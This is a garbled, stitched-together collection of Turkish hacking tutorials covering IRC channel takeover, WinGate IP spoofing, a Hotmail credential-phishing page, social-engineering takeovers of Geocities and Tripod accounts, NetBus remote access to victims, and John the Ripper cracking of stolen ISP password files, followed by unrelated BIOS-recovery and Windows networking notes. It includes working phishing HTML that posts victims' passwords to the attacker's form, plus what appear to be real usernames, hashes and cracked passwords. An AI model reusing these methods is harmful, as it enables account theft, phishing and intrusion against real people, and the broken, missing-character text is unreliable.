kanal split olnus olmali bunu LL ile tespit ediceksiniz)evet nickler deop olduktan sonra hemen serverdan
dissconnect olup tekrar connect olun ve kanala girin hehehe op mop olmadigini goreceksiniz...
TAKTIK ve TAVSIYELER
1-Sabir sizi basariya goturecektir oncelikle takeover edeceginiz kanali cok iyi gozlemlemelisiniz.Dusmaninizi
tanimalisiniz ,kanali yoneten BOT veya insan oplarin vazifelerini kanala devam durumlarini not edin.Ozellikle
rejoin lerde deop gorevini kimin yaptigini(genel de BOT tur) mutlaka tespit edin.Kick-ban...vs islemlerini odada
okuyun herkesin gorevini bilin
2-Oplar MCB saldirilarina karsi surekli nicklerini degistirirler bunlara dikkat edin eger MCB ye yanlis girerseniz
operasyon basarisiz olur.Bu yuzden fake bir MCB duzenleyin ve alternatif nicklerini ogrenin ve bu nicklere gore
yedek MCB hazir da bulundurun...
3-Anlatigim prosedur biraz hizli davranmayi gerektirir bu yuzden panik olmayin sakin olun onlar sizden daha
yavas kalacaktir(oplar)
4-Mutlaka operasyonlariniza ufak ve guvenliksiz kanallarda baslayin aksi taktirde yeterli tecrubeniz olmadan
buyuk kanallari hack etmeniz zorlasacaktir
5-IRC hack icin baska tekniklerde vardir ama beginner icin en ideali budur daha genis bilgi verecem
IP GZLEME spoofing.
Esasinda wingate 1 den fazla bilgisayarin bir internet baglantisini
kullanmasini saglamak icin kullanilir.Ornek:internet cafeler.
Biz winGate in telnet cikisini kullanacagiz.(port 23)Bir wingate server da
yani wingate yuklu ve calismakta olan makinada 23. port a telnet cektiginizde su cevabi alirsiniz.
WinGate>
bu komut satirinda komutlar vererek baska yerlere baglanmak mumkundur.Tabi burdan baglandigimiz
makinalarda bizim degil baglandigimiz wingate server in ip sini goreceklerdir.
Asama -1- Bir wingate server i bulma:
Bunun icin en temiz yol domain scanner yada gate scanner adi verilen programlardan kullanmak ve boylece
kendi serverlarimizi bulmaktir.Piyasada disariya acik oldugu bilinen yuzlerce server vardir
ama bunlari kullanmanizi tavsiye etmem cunku herkes onlara yuklendigi icin bunlardan
spoofladiginizda lag a girersininiz.Tavsiyem GateScan programi.Bu program verilen ip araliklarinda
secilmis bir port un acik olup olmadigini ; eger aciksa belli bir cevabi(recieve string) verip vermedigini kontrol
eder.
Normal durumda,siz degisdirmediginiz surece(halimize bak bi default lafi kullanmicaz diye
kendimizi paraliyoz) port 23 ve receive string WinGate> dir yani wingate serverlarini tespit etmeye
hazirdir.En ustteki kutuya bir ip yazdiginizda ornegin 194.54.48.63 olsun 194.54.48.0 dan baslayarak
194.54.48.255 e kadar
hepsinin 23 . portuna baglanacak WinGate> cevabini verip vermediklerini kontrol edecektir.Tavsiyem irc ye girin
millete dns cekin gelen ip leri buraya yazin.En guzel serverlar Boyle Gecici ip lerden cikar.
Ama 2 saat sonra nolucagini bilemezsiniz.emin olmak isterseniz sitedeki wingate listesindeki server lari
kullanin.
Simdi wingate ip lerimiz hazir dielim. Mesela ip miz 195.33.226.5 olsun.Spooflayacagimiz server da
irc.emu.edu.tr olsun
mIRC yi acin
/server 195.33.226.5:23 ----------->bu komutla sanki bir irc server a baglanir gibi wingate server a
baglaniyoruz.Ayni sekilde isterseniz add server ile listenizede ekleyip sonra bu server lara direkt connect te
edebilirsiniz.
bir suru yazilar gelecektir look up failed falan filan gibi onlari hic takmayin.WinGate> demesini bekleyin......
WinGate> deyince
/quote irc.emu.edu.tr:6667 ---->Bu komutla irc server a o server dan atliyoruz.
Yine bisuru sey sayikliyacaktir onlari da iplemeyin ....
Muhim olan "irc.emu.edu.tr Connected" demesi.Bunu gorunce
/quote user xxxxx xxxxx mail@adresiniz.com xxxxx --> bu xx lerin veya mail in oldu yerde ne yazdy?y muhim
degildir.Bunlar millet size whois cektiginde gorunecek yazilardir.Istediginizi yazabilirsiniz muhim olan kelime
sayisinin ayni olmasi.
/quote nick isminiz
Bundan sonra bekleyin her zaman oldugu gibi irc de olmaniz gerekir.Eger olmassa baska serverlar
deneyin.Girdiginiz zaman kendinize /whois ve /dns cekerek spoof unuzu deneyebilirsiniz
HOTMAIL HACK
Microsoft'un nl cretsiz e-mail sitesi hack edildi. Nasil mi oluyor?
Kurbana Javascript codu iceren bir e-mail attiyorsunuz.Kurban bu e-mail'i grntledigi zaman Javascript kodu
devreye
giriyor ve Kurbana tekrar Login olmasini sylyor.Tabii byle olunca size kurbanin kullanici adi ve ip adresini
iceren bir e-mail
geliyor.
Tabii siz kullanici adini ve sifresini grendiginiz zaman hesabin tam kullanin hakkini kazaniyorsunuz.silmek,
okumak, kurban
adina mailler gndermek... Tabii siz bos durmayip POP Mail'leride kontrol ediyorsunuz ve kurbanin diger
sitelerdeki
hesaplarinin sifrelerini aliyorsunuz.
Netscape kullanicilari javascript ayarlarini syle kapatabilir. (edit / preferences / advanced / disablejavascript).
Microsoft Internet Explorer kullanicilari jscript ayarlarini su sekilde kapatabiliir. (view / internet options /security /
custom
settings / scripting / disable active scripting).
1.ADIM:
hotmail.com sitesini ziyaret ediyoruz ve cretsiz bir e-mail hesabi actiriyoruz. Formu doldururken gercek
bilgilerimizi
vermemize gerek yok. Rastgele birseyler yazsakta olur.
2.ADIM:
Geocities.com sitesini ziyaret ediyoruz ve cretsiz bir e-mail hesabi actiriyoruz. Formu doldururken gercek
bilgilerimizi
vermemize gerek yok. Rastgele birseyler yazsakta olur.1.adimda e-mail adresini kullandik.ve geocities'ten bir email adresi
aldik.rnegin(ybwc@oocities.com).
3.ADIM:
NotePad'imizi aciyoruz ve asagidaki text'i yaziyoruz. Daha sonra message.htm ismini verip kayit ediyoruz. Satir
17'de
Geocities kullanici adimiz yaziyor. (ybwc) 2.adimda belirttigimiz gibi. (bu kullanici adini kendinize gre degistirin.)
<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please relogin.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info
regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.oocities.com/cgi-bin/homestead/mail.pl?ybwc\"
target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\"
name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font
face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\"
size=\"16\" maxlength=\"16\"> <input type=\"submit\"
value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
4.ADIM
kurbanizima yeni bir e-mail mesaji hazirlayip gnderiyoruz.rnegin: kurban, (victim@hotmail.com)olsun. Emailimize message.htm dosyasinida ekliyoruz ve
gnderiyoruz.
5.ADIM
Kurbanimizin e-mailini kontrol etmesini bekliyoruz. Kurban bizim e-maili grntledigi zaman Geocities'teki
mailimizi kontrol ediyoruz. Geocities2ten bir mail
aliyoruz. Tabii bu mail'de kurbanimizin kullanici adi, sifresi
Scan ederek bulduum Patchlenmi Netbus Kurbann daha sonra yine Hacklemek
istiyorum, nas olcak?
Netbusda File Manager'dan Show files'e basn ve c:\program files\ICQ\UIN
directorysindeki *.UIN dosyasn Download ederek kendi bilgisayarnzda altrn.
Bylece adam ICQ listenize alrsnz, Online olduunda bana yine bela aarsnz
GEO/TRIPOD :)
Geocities, Tripod gibi cretsiz yer veren siteleri Hack Etmek
Bi web sayfasn hack etmenin en kolay yolu Backoffricele adama balanp email ifresini almaktr..eer sayfa
xoom tabanl filansa
zaten Backoffrice sayfann ifresini size gstericek. Diilse adamn int. ifresini aln passes komutuyla email adresi
ifresiyle ayndr
daha sonra ise Geocities ,xoom ..ya mail attn bunlarn hepsinde ifremi unuttum email adresime postalayn
blm vardr o blmden
mail atn 5 dakka sonra adamn mail hesabna girin..o kadar basit.
Geocitiesi HACK etmek iin nce Hotmail gibi bi yerden bi email adresi aln sonra Geocities adreslerini tarayn
sayfann sahibinin ad
soyad doum tarihini ve email adresini veren bi sayfa bulun. www.oocities.com/SiliconValley/1001 den balayn
1002
1003.....tarayn.tataa buldunuz imdi http://www.oocities.com/help/pass_form.html adresine gidin (bu adres
deimi olabilir ama
daima geocities in iinde help blmndedir!)Formda Geocities in database indeki email adresini sorduunda
adamn amil adresini
yazn ve daha sonra yeni emaili iaretleyin ve Hotmailden aldnz email adresini yazn ve daha sonra hotmaile
urayn aa ifreyi
gndermiler.
Ama gndermeyede bilirler kesin bi ihtimal diildir bu (yoksa her nne gelen geocitiesi krard )Eer geocitiesdeki
ynetici
sandmzdan daha akllysa adama mail atn ve yanllkla ifreyi deitirdiinizi ve email adresiniziz deitiini
syleyin eer ifreyi
deitirdiinizi duyarlarsa ailenizin sizi ldreceini sylemeyi unutmayn!
Eer adamn zellikleri websayfasnda yoksa sayfann sahibine mail atn kalem arkada olmak istediinizi
syleyin ve adam kafaya
alp btn zelliklerini aln ve formda yerine yazn =)
TRPODU KIRMAK
Tripodu krmak iin sadece internet hesabna ve 1-2 hafta sreye ihtiyacnz var.nce adamn Tripoid user
nameine ihtiyacnz var.
http://members.tripod.com/~username (user name bu adreste en sona yazdnz ite)sonra adamn gerek
ismini renmelisiniz:
http://www.tripod.com/planet/profile/search.html adresinden adam hakknda bildiiniz hereyi yazarak
renebilirsiniz eer
member profile girebilirseniz adam hakkndaki hereyi reniceksiniz city,country...Eer bu adresten
bulamazsanz adam buraya bi
member profile koymam demektir o zaman Icq dan info ekin adama =)
"If you need to change your email address, please contact us at membership@tripod.com with your new email
address. Please include
your member name, old email address, and full name in the message."
**************************************end
Bu yazda diyoki email adresinizi deitirdiyseniz kullanc adnz ve eski email adresinizi tm isminiz ve
soyisminizi yazn vve yeni
email adresinizi (hotmailden aldnz)Sonra size byle bi email gelicek
Dear "User", Thank you for informing us of your new email address. We have updated your membership
information:Tripod member
name: eskikullancad (unchanged)
sisteminize eklenecektir.
2)Start Menusunden Programs* Accessories* Communications* Hyper Terminal yapn. Bir klasor aclacak. Burada
HYPERTRM.EXE uzerine cift tklayn. Yeni bir hyperterminal baglants yaratmanza yardmc olacak bir diyalog
kutusu aclacaktr.
3)Bu diyalog kutusunda Name bolumune "bilinmeyen numaralar" yazn ve Enter tusuna basn
ACCOUNT HACK 1
Account Hack
John bilmemnenetpass.txt -i:ALL -beep ----> Burada ALL:hem rakam , hem harf olduunu belirtmektedir.
ALL yerine ALPHA yazarsanIz sadece harf , DIGIT yazarsanIz sadece rakamlarI gz nnde
bulundurur.
Ancak ncelikle Trkiye deki iss lerin %90 I min:4 , max:8 karakter kullanmaktadIrlar. Bu sebeple
isiniz daa kolaylassIn die John.ini dosyasInIn icinden max ve min i ayarlamanIzI tavsiye ederim.
bilmemnenetpass.txt ise , mesela atonetten(prizma,raksnet...) ifre aldInIz ve nete baalandInIz.Ftpden
baalanIn (ftp.****.net) ve pass dosyasInI indirin iste burda yazan *.txt dosyasI ftpden indirilmis
dosyadIr.Bu anlattIIm yntem wordlist gerektirmeyen kolay yntemdir.Son olarakta dosta yazdIImIz
-beep her pass kIrIldIgInda size haber vermesi icin yararlIdIr...
Eger krma islemini wordlistle yapmak istiyorsanz ki ben bunu tavsiye ederim,o zaman buradaki satIrI dosta
yazmanIz gerekir;
john -wordfile:wordlist.txt -pwfile:herhanginetpass.txt >sonuclar.txt
wordlist.txt elinizde bulunan kelime arsivleridir.Iste size meliksah In yazdIgI bir program,adI sibop ve gzel bir
wordlist hazIrlayan program,Download ediniz;
herhanginetpass.txt elinizde bulunan ftp ile alInmIs password dosyasIdIr,unshadowludur,denemelik bunu alIn;
sonuclar.txt ise ;
cana (tsengor)
murat (hmurat)
Bu sekilde krIlacak passwordlerin bulunacagI dosyadIr.parantez icindeki password
ACCOUNT HACK 2
Account Hack
John The Ripper Kullanimi Basit Olan ve En iyi crack programlarindan biri==>
Acc kirmak icin passwd diye adlandirilan dosyalardan elinizde bulunmasi lazim bunu bazi yeni isp lerin ftplerinden
(oranin ftp
kullanici iseniz genelde etc/passwd dizininde bulunurlar) cekmenize izin verirler.Anonymous baglantilarda bu
dosyalari cekmenize
izin verilmez. Bu tip dosyalari toparladiktan sonra. John The ripper programini cekmelisiniz
Simdi John da kendiliginden 3 adet kirma bicimi var. Bunlar: ALPHA : Sadece harfler DIGITS : Sadece rakamlar
ALL : Hepsi
Simdi John.ini dosyasyny actiginyzda oradan kullanacaginiz bicimi bulun. Mesela ALPHA yi bulalym. Bulduk Simdi
altta Minimum
ve Maximum lenght var. Bunlar en az ve en cok hane sayisidir. SOL disinda Turkiye'deki butun ISP lerde minimum
4 maximum 8
hane vardir. Tamam bunuda ayarladik diyelim. Daha sonra dos komut satirinda Sunlary yazyn: JOHN dosyaadi
-i:bicim -beep
(burada dosya adi bizim netten cektigimiz passwd dosyasi oluyor. Burda bicim yerine ALL ALPHA veya DIGITS
yazicaksiniz. BEEP
ise her pass kirdiginda bip sesi cikarmasini saglar. rnek : John passwd.txt -i:ALL -beep heee bide wordlist ile
Kirrma Yntemi vardir.
Bu Yntem ok Degisiktir:ilk nce bir wordlist yaratirsiniz (ok iyi Bir Arsiv Hazirladim!!!Kesin Bulundurun!!
<http://www.uha1.com/wordlist/words.zip>) John butun harfleri ve digitleri teker teker deneyecegine sizin
verdiginiz Dosyadaki
kelimeleri dener!!
Kullanim Yntemi ise:: john <dosya adi> -w:<wordlist adi> -beep
------------John The Ripper Kullanma Kiilavuzu----------John the Ripper(kisaca John amca) bence piyasada bulabilceginiz en baba unix passwd cracker dir.simdi siz
herhangi bir yntemle
passwd yi cektiniz.Ama birinci soru bu passwd shadowed mu.Shadowed passwd
lerde sadece o user in sifresinin shadow file daki yerini belirten bi sayi olur ve o sayiya gre makine shadow file a
bakar ve
o username icin girelen password ile dosyadaki password u karsilastirir. Yani asil almaniz gereken dosya
shadowed sitemlerde
/etc/shadow dur ama bu dosyaya erisim hakki sadece super user a aittir.(root)Yani sikar biraz. Kisaca Shdowed bi
dosya Shadow
file olmadan bi bok a yaramaz.Kiramazsiniz
Alin size Shodowed ve un Shadowed passwd rnekleri::
Bu satirlar shadowed bi passwd dosyasindan alinmistir(ispronet Clansman'dan aldik lawuk shadowed u cekmis
euheuhe)
root:*:0:0:finland.ispro.net.tr,ISPRO:/root:/usr/local/bin/tcsh
toor:*:0:0:Bourne-again Superuser:/root
xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent
ilk satiri inceleyelim
s.N= shadow nosu=shadow file daki no su
|user| |s.N| |ayrintilar| |dizini| |shell dizini ve turu|
root:*:0:0:finland.ispro.net.tr,ISPRO:/root:/usr/local/bin/tcsh
Bu satirlarda shadow lanmamis passwd den:: (Bm -Net)
atabarut:iP0nvdXsd0bE2:504:100:Necdet Atabarut:/home/atabarut:/bin/sh
abali:btf6TGc5jaCwY:505:100:Muammer Abali:/home/abali:/usr/local/bin/dmenu
ceyhun:7kTb6N0tEaTcE:508:100:Ceyhun Ors:/home/ceyhun:/usr/local/bin/dmenu
kadircan:xt4UmVJxTBpbw:507:100:Kadircan Abali:/home/kadircan:/usr/local/bin/dmenu
Sanirim bunda incelemeye gerek yok olay acik.Ayni seyler gecerli.
------------simdi gelelim kirma isleminee::-----------Benim tavsiyem Wordlist yani kelime listesi kullanmaniz. Eger Wordlist ne derseniz belli sayida harfin tum
kombinasyonlarinin
her satirda bir kelime olmak uzere metin dosyasi haline getirilmisidir. Wordlist olusturmak icin meliksah aganin
Sibop unu tavsiye
ederim. (8 karakterli bir wordlist= 1.5 GB)
------John un wordlistli kirma komutu:::------john -wordfile:wordlist dosyasini buraya yazininiz -pwfile:sifredosyasini buraya yaziniz. > kirilan sifrelerin
kaydedilecegi dosya adini
buraya yaziniz. size bi tavsiye 4 karakterli sadece sayidan olusan bi wordlist hazirlayin
(0.5 mb bile tutmaz)Dogum tarihini sifre yapanlari yakalarsininiz.
ha bu arada son kisma kayit dosyasi yazdiimiz icin eger bi bokluk ciksa bile john bisey demicektir.sasirmayin
herhangi bir hata
falan verirse bunlarda o yazdigimiz dosyaya kaydedilecektir. islem bittinde bu dosyayi herhangi bir metin editru
ile acip
bakabilirsiniz.
yada kayit dosyasi kullanmadan yapin gerci tavsiye etmem.Format falan atarsaniz yada john.pot u bi sekilde
kayberderseniz.
kirdiklariniz gider.Ama kayit dosyasi bu riski kaldirir.
------Kayit dosyasi olmadan kirma komuttu::-----------john -wordfile:listedosyasi -pwfile:sifredosyasi bu komut ile kirdiginizda sifreler ekrana cikar.
-------------------rnek verim.------------------------------------John the Ripper Version 1.4 Copyright (c) 1996,97 by Solar Designer Loaded 201 passwords with 170 different
salts (DES)
onguru10 (onguru) aytac11 (ksoytac) aytac11 (ksaytac) ali19 (ayata) tunay94 (tunay) ofalay96 (ofalay) hyb96
(ferhan )hyb96
(ertugrul) tatko97 (tatko) uler97 (mukaddes) kbc97 (kbc) susen97 (susen) ttggrd97 (ttggrd)bircan97 (bircan)
bilal97 (bilal) ykocak97
(ykocak) aaker97 (aaker) levent97 (levente) aristo97 (aristo)
--Parantez icindekiler usernamedir.
> Sonradan bu kirilan acc leri tekrar cikartmak isterseniz john -show sifredosyasi yaziniz.
-------------------------simdi gecelim Single Mod a-------------------Single mod da john amca sadece passwordu ile kullanici ayrintilari yada username i yakin olan sifreleri
kirar.hasan-hasan98 gibi
yada ayrintilarda amcuk insaat as yaziyorsa.hasan-amcukins gibi. Cok hizlidir 5 dk da ato dan 90 tane acc
kirarsiniz.Bu komut cok
faydalidir ama herkes ilk bunla kiracagi icin kircaganiz acc lar coktan orospu olmus herkesin eline gecmistir.
Bu yuzden eger saglikli bi acc istiyorsaniz.Diger modlarda kiriniz.
Win95.CIH Anakart 'inizi yakti. Ve Hard diskinizi sildi. Hibir masraf demeden hepsini kurtarmanin yolunu anlatiyorum.
ok iyi okuyun.!!
Anakart 'i kurtarma;
Not: Asagidaki islemleri bilgisayarin iini aipta halledeceksiniz. Eger anlamiyorsaniz Anakart ile daha nce ugrasmis bir
arkadasiniza syleyin bu yaziyi. O size uygulasn. ( Para isterse sakn vermeyin. :) ) Ayrica SARI renklerin arasindaki
islemlerde elektrik gider veya bilgisayar kapanirsa arkadasinizin anakart 'i yanabilir.
1- imdi anakart' sizin anakart'nzla ayn olan bir arkadanza gidin, (Marka ve Model ayn olmal.. eger ayn model
bulamazsanz ok yakn bir model arayn. Bozuk makinenizdeki BIOS 'u karacaksnz. Ve Arkadanzn evine
gtreceksiniz.(Flash BIOS 'unuzun tutulduu ok ayakl entegre devre. Hani bizim CIH 'in sildii yer oras ite. Zaten
anakart'nzn zerinden sklebilen tek devre.)
2- Arkadanzn sistemini DOS 'tan temiz bir disket ile boot edin. Tabi boot disketine anakartnzn Flash Memory
Update Software 'ini koyun. (BIOS dosya'sn bulamasada olur. Flash Utility'lerinin hepsi arkadanzn BIOS'u disketinize
yazabilir.)
3- te En nemli blme geldik. Arkadasinizin Bilgisayarini baslatin. BOOT ettik. ve bilgisayar karmzda ii ak ve
alr biimde belkiyor. imdi ok zarif ve dengeli hareketlerle BIOS 'u anakart 'n zerinden karn. ( Not: flash
bellee demeden nce ok dikkatli olmalsnz. zerinizde Statik elektrik varsa hasar olabilir.) (yanl bir harekette
bilgisayar kitlenir.Elektrii kesip , Flash ' yerine koyup yeniden baa dnn.)
4- Kendi makinanzdan sktnz BIOS 'u arkadanzn BIOS 'unu kardnz ayn yere takn. Ve boot disketine
koyduunuz BIOS update programn altrn. Bu program silinmi bios'unuzu programlayacaktir. Bu Vakite kadar
herey normal giderse ve program BIOS UPDATED gibi bireyler sylerse bilgisayar kapatn. Sonra kendi BIOS 'unuzun
arkadanzn bilgisayarndan karn.(Not: Artk BIOS 'unuzu dzelttiniz. Elinizdeki BIOS 'unuzu evinize gtrp
bilgisayarnza takn, alisacaktir.!) Ve Arkadanzn BIOS 'unu eski yerine takn.
Teorik olarak evet ulalabilir. Fakat adaki veya internet zerinde ki bir bilgisayara ping
attnz zaman ping komutunuza cevap alabilirken, baz sunuculara ping attnzda
geriye cevap alamayabilirsin.
Bunun nedeni ICMP paketleri firewallar tarafndan engellenmesidir. Bu sunuya
ulaamadnz anlamna gelmemektedir.
===>Traceroute(Tracert)<===
Network TCP/IP iinde kullanlan bir sorgulama komutudur.
Bu komut ile gnderilen paketin hangi a geitlerinden getii takip edilir ve bu yolla
bir paketin u noktaya hangi yollar izleyerek gittii grlr.
Her geilen cihaz iin 1 tane IP numaras gsterir
rnek Verecek olursak sizin www.Cyber-warrior.org adresini yazp entere bastnzda
hangi yollardan geerek ulatn gsterir.
===>Ipconfig<===
bu komutla bilgisayarnzn aa ait olan bilgilerini grebilirsiniz. Bunlarn arasnda aa
balanrken kullanlan IP adresi, gateway sunucusunun IP adresi gibi bilgiler bulunabiliyor.
Ipconfig Komutunun Uygulanmas
Bu komutun salad en byk yarar bilgisayarmzn aa balanrken kullanaca geerli
bir IP adresi alnp, alnmadn renmemizi salar.
===>netstat<===
Bilgisayarnzn bir a ortamnda kurmu olduu balantlarn bir listesini kartr. Bu
listede bal bulunan noktann IP veya DNS adresi, TCP port numaras gibi bilgiler
bulunur.
Bu komut sisteme doru veya sistemden darya doru oluan bir worm, hack veya
benzeri bir saldr durumunda ok ie yarar.
rnein tm pencereleri kapatmanza ramen sistemden darya doru bir ok SMTP
balantsnn grlmesi muhtemel bir solucan (worm) varlna dalalettir.
Bu komutlarn sadece yerel alar iin deil internet gibi geni alan alarnda (WAN Wide
Area Network) da sklkla kullanldn belirtelim. Tabii internette dolarken resimde
grlen liste daha uzun oluyor.
netsat komutu parametreleri
netstat -n: adresleri ve balant noktalarnn numaralarn saysal biimde gsterir (bunu
herkes biliyo zati )
netstat -a -n: dosya alrken kardakinin p nosunu gsterir (bu da ok iyi bir yntemdir
ama amacmz p bulmak deil bu konuda tabi)
netstat -a: tm balantlar ve dinleme balant noktalarn gsterir
netstat -b: her balant veya dinleme balant noktas ile ilikili altrlabilir dosyay
gsterir.
===>net share<===
Net share komutu paylalan dosyalar konsolda listeler .
net share konsoldan (komut satrndan) kaynaklar paylama amak iin kullanlr.
Bu ekilde gzden kaan ve $ ile girelebilen paylamlar grebiliriz.
ShareName : Paylama alan kaynan ad
Drive:Path : Paylam yolu
/users:number : Kaynaklara erimek isteyen maksimum kullanc says
/unlimited : snrsz kullanc bu kaynaklara eriebilir
ekleyebiliriz. Aklamay text yazan yere yazyoruz.stteki resimde remark ksmnda
paylama alan kaynak hakknda aklama var.
/delete : kaynaklarn btn paylamlarn durdurur.Paylam Kaldrmak iin kullanlr.
net help command : yardm almak iin kullanrz.
===>net use<===
Net Use komutu adaki bir kaynan paylamn ya da kullanmn salar.
Bir bilgisayar bir aa balarken, varolan balantsn keserken ya da balantlarnn
durumunu renirken eitli parametreleriyle bu komut kullanlabilir.
Net use, Ms-Dos komut satrnda altrlr. Mevcut balant durumunu renmek iin
parametresiz olarak altrlr.
Parametreleri
DeviceName Balant yaplacak ya da balants kesilecek kaynan addr. Kaynaklar iki
eit olabilir; paylam olan herhangi bir makine (D:den Z:ye kadar) ya da yazclar
(LPT1:den LPT3:e kadar).
?\\\\ComputerName\\\\\\\\ShareName
Sunucu ya da paylaml kaynan ad. Eer ComputerName ierisinde boluklar
ieriyorsa, trnaklarla "\\\\\\\\\\\\\\\\Computer Name\\\\\\\\Share Name" yazlmas